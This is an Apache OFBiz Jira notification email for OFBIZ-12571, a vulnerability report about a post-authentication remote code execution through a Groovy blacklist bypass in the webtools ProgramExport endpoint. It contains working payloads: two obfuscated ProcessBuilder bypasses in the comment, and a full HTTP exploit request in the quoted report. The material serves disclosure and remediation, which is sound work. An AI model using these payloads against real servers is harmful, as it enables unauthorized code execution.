You are viewing a plain text version of this content. The canonical link for it is here.

Posted to notifications@ofbiz.apache.org by "Y4er (Jira)" <ji...@apache.org> on 2022/02/11 01:03:00 UTC

[jira] [Commented] (OFBIZ-12571) groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport

    [ https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17490593#comment-17490593 ] 

Y4er commented on OFBIZ-12571:
------------------------------

Simply adding a blacklist can't solve the fundamental problem. Judging from the current blacklist after the repair

[https://github.com/apache/ofbiz-framework/commit/f2cf262cf56df86612971bf4dac82795c1e3a512#diff-5d4b97fff9ee1d57e4c1d8274847e196ba5404f367afb3e39025f583a3e95e1aR252]

 

there are still many ways to rce. for example

 
{code:java}
example 1
def strings = new ArrayList<String>();
strings.add("calc")
def instance = Class.forName("java.lang.Pr" + "ocessBuilder").getDeclaredConstructor(List.class).newInstance(strings)
def method = instance.getClass().getDeclaredMethod("start", null)
method.invoke(instance,null)  

example 2
evaluate("Proces"+"sBuilder.newInstance(\"calc\").start()") {code}
Given the flexibility of the groovy language, we cannot fix this vulnerability just by strings blacklisting, because there are always multiple unknown bypasses.

Perhaps the groovy sandbox should be considered to handle this.

> groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
> -------------------------------------------------------------------------------
>
>                 Key: OFBIZ-12571
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12571
>             Project: OFBiz
>          Issue Type: Bug
>          Components: framework/webtools
>    Affects Versions: 18.12.05
>         Environment: ofbiz 18.12.05
>            Reporter: Y4er
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.06, 22.01.01
>
>         Attachments: image-2022-02-10-17-50-58-914.png
>
>
> groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
>  
> {code:java}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!



--
This message was sent by Atlassian Jira
(v8.20.1#820001)